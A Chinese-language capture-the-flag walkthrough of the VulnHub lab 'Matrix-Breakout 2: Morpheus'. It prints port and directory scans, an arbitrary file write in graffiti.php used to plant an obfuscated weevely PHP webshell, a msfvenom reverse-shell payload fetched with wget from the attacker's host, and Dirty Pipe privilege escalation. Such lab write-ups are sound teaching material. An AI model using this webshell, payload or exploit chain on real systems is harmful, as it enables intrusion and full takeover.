前言 This is the second in the Matrix-Breakout series, subtitled Morpheus:1. It’s themed as a throwback to the first Matrix movie. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out from, which holds the key to a mystery.
Difficulty: Medium-Hard
Download: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
信息收集 获取到ip和端口信息,使用nmap进行探测获取到的结果如下:
1 2 3 4 5 6 7 8 9 Nmap scan report for 192.168.73.163 Host is up (0.0011s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) 80/tcp open http Apache httpd 2.4.51 ((Debian)) 81/tcp open http nginx 1.18.0 MAC Address: 00:0C:29:96:A7:B7 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
访问80端口如图所示:
f12查看一下网页源码没有什么有用的信息,访问robots.txt文件提示:There’s no white rabbit here. Keep searching!
使用目录扫描其它文件。
1 gobuster dir -u http://192.168.73.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.js
扫描任务建立后去访问81端口,访问之后出现
最后的目录扫描结果如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 └─$ gobuster dir -u http://192.168.73.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.js =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.73.163 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Extensions: js,php,txt,html [+] Timeout: 10s =============================================================== 2023/11/14 01:43:51 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 348] /.php (Status: 403) [Size: 279] /.html (Status: 403) [Size: 279] /javascript (Status: 301) [Size: 321] [--> http://192.168.73.163/javascript/] /robots.txt (Status: 200) [Size: 47] /graffiti.txt (Status: 200) [Size: 139] /graffiti.php (Status: 200) [Size: 451] /.html (Status: 403) [Size: 279] /.php (Status: 403) [Size: 279] /server-status (Status: 403) [Size: 279] Progress: 1102196 / 1102805 (99.94%) =============================================================== 2023/11/14 01:53:57 Finished ===============================================================
漏洞利用 爆破一下ssh和尝试81端口的登录无果,访问graffiti.php和graffiti.txt发现在graffiti.php提交的内容会出现在graffiti.txt文件中并返回在php页面当中。
抓取数据包查看一下,简化后的数据包:
1 2 3 4 POST /graffiti.php HTTP/1.1 Host : 192.168.73.163message =1 &file =graffiti.txt
可以看到message和file参数,message参数是提交的内容,file参数是文件名。这里有两种思路,首先页面显示内容为graffiti.txt文件的内容,如果更改file参数是否返回所更改的文件内容,其次是如果将file参数更改成一个新的php文件会是否能写入shell。file参数为../../../../../etc/passwd提交之后返回的内容如下:
1 2 3 4 5 6 7 8 <h1 > <center > Nebuchadnezzar Graffiti Wall </center > </h1 > <p > Cannot open file: ../../../../../etc/passwd
使用php伪协议读取源码,file参数更改为php://filter/convert.base64-encode/resource=graffiti.php提交之后返回的内容如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <h1 > <center > Nebuchadnezzar Graffiti Wall </center > </h1 > <p > PGgxPgo8Y2VudGVyPgpOZWJ1Y2hhZG5lenphciBHcmFmZml0aSBXYWxsCgo8L2NlbnRlcj4KPC9oMT4KPHA+Cjw/cGhwCgokZmlsZT0iZ3JhZmZpdGkudHh0IjsKaWYoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT0gJ1BPU1QnKSB7CiAgICBpZiAoaXNzZXQoJF9QT1NUWydmaWxlJ10pKSB7CiAgICAgICAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsKICAgIH0KICAgIGlmIChpc3NldCgkX1BPU1RbJ21lc3NhZ2UnXSkpIHsKICAgICAgICAkaGFuZGxlID0gZm9wZW4oJGZpbGUsICdhKycpIG9yIGRpZSgnQ2Fubm90IG9wZW4gZmlsZTogJyAuICRmaWxlKTsKICAgICAgICBmd3JpdGUoJGhhbmRsZSwgJF9QT1NUWydtZXNzYWdlJ10pOwoJZndyaXRlKCRoYW5kbGUsICJcbiIpOwogICAgICAgIGZjbG9zZSgkZmlsZSk7IAogICAgfQp9CgovLyBEaXNwbGF5IGZpbGUKJGhhbmRsZSA9IGZvcGVuKCRmaWxlLCJyIik7CndoaWxlICghZmVvZigkaGFuZGxlKSkgewogIGVjaG8gZmdldHMoJGhhbmRsZSk7CiAgZWNobyAiPGJyPlxuIjsKfQpmY2xvc2UoJGhhbmRsZSk7Cj8+CjxwPgpFbnRlciBtZXNzYWdlOiAKPHA+Cjxmb3JtIG1ldGhvZD0icG9zdCI+CjxsYWJlbD5NZXNzYWdlPC9sYWJlbD48ZGl2PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZXNzYWdlIj48L2Rpdj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9ImdyYWZmaXRpLnR4dCI+CjxkaXY+PGJ1dHRvbiB0eXBlPSJzdWJtaXQiPlBvc3Q8L2J1dHRvbj48L2Rpdj4KPC9mb3JtPgpNUW89<br > <p > Enter message: <p > <form method ="post" > <label > Message</label > <div > <input type ="text" name ="message" > </div > <input type ="hidden" name ="file" value ="graffiti.txt" > <div > <button type ="submit" > Post</button > </div > </form >
使用base64解码之后的内容如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 └─$ echo "PGgxPgo8Y2VudGVyPgpOZWJ1Y2hhZG5lenphciBHcmFmZml0aSBXYWxsCgo8L2NlbnRlcj4KPC9oMT4KPHA+Cjw/cGhwCgokZmlsZT0iZ3JhZmZpdGkudHh0IjsKaWYoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT0gJ1BPU1QnKSB7CiAgICBpZiAoaXNzZXQoJF9QT1NUWydmaWxlJ10pKSB7CiAgICAgICAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsKICAgIH0KICAgIGlmIChpc3NldCgkX1BPU1RbJ21lc3NhZ2UnXSkpIHsKICAgICAgICAkaGFuZGxlID0gZm9wZW4oJGZpbGUsICdhKycpIG9yIGRpZSgnQ2Fubm90IG9wZW4gZmlsZTogJyAuICRmaWxlKTsKICAgICAgICBmd3JpdGUoJGhhbmRsZSwgJF9QT1NUWydtZXNzYWdlJ10pOwoJZndyaXRlKCRoYW5kbGUsICJcbiIpOwogICAgICAgIGZjbG9zZSgkZmlsZSk7IAogICAgfQp9CgovLyBEaXNwbGF5IGZpbGUKJGhhbmRsZSA9IGZvcGVuKCRmaWxlLCJyIik7CndoaWxlICghZmVvZigkaGFuZGxlKSkgewogIGVjaG8gZmdldHMoJGhhbmRsZSk7CiAgZWNobyAiPGJyPlxuIjsKfQpmY2xvc2UoJGhhbmRsZSk7Cj8+CjxwPgpFbnRlciBtZXNzYWdlOiAKPHA+Cjxmb3JtIG1ldGhvZD0icG9zdCI+CjxsYWJlbD5NZXNzYWdlPC9sYWJlbD48ZGl2PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZXNzYWdlIj48L2Rpdj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9ImdyYWZmaXRpLnR4dCI+CjxkaXY+PGJ1dHRvbiB0eXBlPSJzdWJtaXQiPlBvc3Q8L2J1dHRvbj48L2Rpdj4KPC9mb3JtPgpNUW89" | base64 -d <h1> <center> Nebuchadnezzar Graffiti Wall </center> </h1> <p> <?php $ file="graffiti.txt" ; if($ _SERVER['REQUEST_METHOD' ] == 'POST' ) { if (isset($_POST['file'])) { $file=$_POST['file']; } if (isset($_POST['message'])) { $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file); fwrite($handle, $_POST['message']); fwrite($handle, "\n"); fclose($file); } } // Display file $ handle = fopen($file ,"r" ); while (!feof($handle)) { echo fgets($handle); echo "<br>\n"; } fclose($ handle); ?> <p> Enter message: <p> <form method="post"> <label>Message</label><div><input type="text" name="message"></div> <input type="hidden" name="file" value="graffiti.txt"> <div><button type="submit">Post</button></div> </form> MQo=
通过源码分析发现,$file变量是可以控制的,而且在fwrite函数中没有对$file变量进行过滤,可以通过$file变量写入任意文件。使用weevely生成木马:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(test㉿kali)-[~/Desktop] └─$ weevely generate test backdoor.php Generated 'backdoor.php' with password 'test' of 680 byte size. ┌──(test㉿kali)-[~/Desktop] └─$ cat backdoor.php <?php $ n='Z_Zend_clean();$r=@baseZ64_encZoZdeZ(@xZ(@gzZcompress($o),$Zk));pZrint("$p$Zkh$r$kf");}' ; $ b='$Zj=0;($j<$c&ZZ&$i<$l);$j++,$Zi++ZZ){$o.=$tZ{$i}^$k{$j};}}reZtuZrnZ $o;}if (@pZZreg_maZtc' ; $ c='h("/$kh(.Z+)$kZf/"Z,@file_get_ZcontZents("phpZ://iZnputZ"),$m)==1) {@Zob_sZtart();@eZva' ; $ M='ZlZ(@gzuncomprZessZ(@xZ(@base6Z4Z_decode($m[1]Z),$k))Z);$o=Z@ob_geZt_contentsZ(Z);@ob' ; $ g='$kZZ="098f6bcd";$kh="4Z621d3Z73cZade";$kZZf="4e8326Z27b4f6";$pZ="64xZiGliK6ZTiXe5uw";fZu' ; $ o='nctiZon x($tZZ,$kZZ){$c=strlen(Z$k);$l=strZlenZ($t);$o=Z"";for($iZ=Z0;$ZZi<$l;){for(' ; $ r=str_replace('s' ,'' ,'scrsseate_fsunssction' ); $ u=str_replace('Z' ,'' ,$g .$o .$b .$c .$M .$n ); $ C=$r ('' ,$u );$C (); ?>
在页面中将生成的木马复制在输入框中,然后burp抓包将file参数更改为backdoor.php,提交之后返回的内容如下:
1 2 3 4 POST /graffiti.php HTTP/1.1 Host : 192.168.73.163message= %3 C%3 Fphp+%24 n%3 D%27 Z_Zend_clean%28 %29 %3 B%24 r%3 D%40 baseZ64 _encZoZdeZ%28 %40 xZ%28 %40 gzZcompress%28 %24 o%29 %2 C%24 Zk%29 %29 %3 BpZrint%28 %22 %24 p%24 Zkh%24 r%24 kf%22 %29 %3 B%7 D%27 %3 B+%24 b%3 D%27 %24 Zj%3 D0 %3 B%28 %24 j%3 C%24 c %26 ZZ%26 %24 i%3 C%24 l%29 %3 B%24 j%2 B%2 B%2 C%24 Zi%2 B%2 BZZ%29 %7 B%24 o.%3 D%24 tZ%7 B%24 i%7 D%5 E%24 k%7 B%24 j%7 D%3 B%7 D%7 DreZtuZrnZ+%24 o%3 B%7 Dif+%28 %40 pZZreg_maZtc%27 %3 B+%24 c %3 D%27 h%28 %22 %2 F%24 kh%28 .Z%2 B%29 %24 kZf%2 F%22 Z%2 C%40 file_get_ZcontZents%28 %22 phpZ%3 A%2 F%2 FiZnputZ%22 %29 %2 C%24 m%29 %3 D%3 D1 %29 +%7 B%40 Zob_sZtart%28 %29 %3 B%40 eZva%27 %3 B+%24 M%3 D%27 ZlZ%28 %40 gzuncomprZessZ%28 %40 xZ%28 %40 base6 Z4 Z_decode%28 %24 m%5 B1 %5 DZ%29 %2 C%24 k%29 %29 Z%29 %3 B%24 o%3 DZ%40 ob_geZt_contentsZ%28 Z%29 %3 B%40 ob%27 %3 B+%24 g%3 D%27 %24 kZZ%3 D%22098 f6 bcd%22 %3 B%24 kh%3 D%224 Z621 d3 Z73 cZade%22 %3 B%24 kZZf%3 D%224 e8326 Z27 b4 f6 %22 %3 B%24 pZ%3 D%2264 xZiGliK6 ZTiXe5 uw%22 %3 BfZu%27 %3 B+%24 o%3 D%27 nctiZon+x %28 %24 tZZ%2 C%24 kZZ%29 %7 B%24 c %3 Dstrlen%28 Z%24 k%29 %3 B%24 l%3 DstrZlenZ%28 %24 t%29 %3 B%24 o%3 DZ%22 %22 %3 Bfor%28 %24 iZ%3 DZ0 %3 B%24 ZZi%3 C%24 l%3 B%29 %7 Bfor%28 %27 %3 B+%24 r%3 Dstr_replace%28 %27 s%27 %2 C%27 %27 %2 C%27 scrsseate_fsunssction%27 %29 %3 B+%24 u%3 Dstr_replace%28 %27 Z%27 %2 C%27 %27 %2 C%24 g.%24 o.%24 b.%24 c .%24 M.%24 n%29 %3 B+%24 C%3 D%24 r%28 %27 %27 %2 C%24 u%29 %3 B%24 C%28 %29 %3 B+%3 F%3 E&file= backdoor.php
访问http://192.168.73.163/backdoor.php发现可以访问,上传成功,使用weevely连接木马并查看当前用户:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 ┌──(test㉿kali)-[~/Desktop] └─$ weevely http://192.168.73.163/backdoor.php test [+] weevely 4.0.1 [+] Target: www-data@morpheus:/var/www/html [+] Session: /home/test/.weevely/sessions/192.168.73.163/backdoor_0.session [+] Shell: System shell [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely> id uid=33(www-data) gid=33(www-data) groups=33(www-data)
提权 通过msf反向连接,生成payload:
1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.138 LPORT=9999 -f elf -o escalate.elf
使用python开启http服务:
使用weevely连接木马,切换到tmp目录,在目标机器上下载payload:
1 wget http://192.168.73.138:8000/escalate.elf
设置执行选项并执行escalate.elf
1 2 3 4 5 6 7 8 use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp # 查看需要设置的参数并进行设置 show options # 最后执行exploit run
1 2 3 4 5 6 search suggester use post/multi/recon/local_exploit_suggester # 设置已经建立的session进行扫描 set session 1 run
1 use exploit/linux/local/cve_2022_0847_dirtypipe
设置好对应参数之后直接run即可,成功提权。
